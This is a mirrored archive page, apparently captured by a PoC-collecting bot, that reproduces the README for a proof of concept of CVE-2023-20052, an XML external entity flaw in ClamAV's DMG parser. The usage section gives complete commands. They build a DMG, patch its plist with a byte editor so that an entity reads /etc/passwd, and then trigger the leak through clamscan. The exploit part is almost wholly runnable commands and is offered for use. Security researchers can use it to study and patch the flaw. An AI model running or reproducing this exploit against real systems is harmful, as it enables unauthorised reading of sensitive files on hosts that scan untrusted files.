CVE-2023-20052 PoC — ClamAV 安全漏洞

Source

https://github.com/nokn0wthing/CVE-2023-20052

Associated Vulnerability

Title:ClamAV 安全漏洞 (CVE-2023-20052)
Description:ClamAV（Clam AntiVirus）是ClamAV团队的一套免费且开源的杀毒软件。该软件用于检测木马、病毒、恶意软件和其他恶意威胁。 ClamAV存在安全漏洞，该漏洞源于XML外部实体注入，未经身份验证的远程攻击者利用该漏洞可以访问受影响设备上的敏感信息。

Description

CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Readme

# CVE-2023-20052
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage  
To create malicious DMG file
```
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
```
![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/1.png)

To trigger exploit  
`clamscan --debug exploit.dmg `  

![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/2.png)

File Snapshot


 [4.0K]  /data/pocs/44da006490a122d9db42a85b116cb5bef05a576a
├── [ 24K]  1.png
├── [ 22K]  2.png
├── [ 556]  Dockerfile
└── [ 859]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!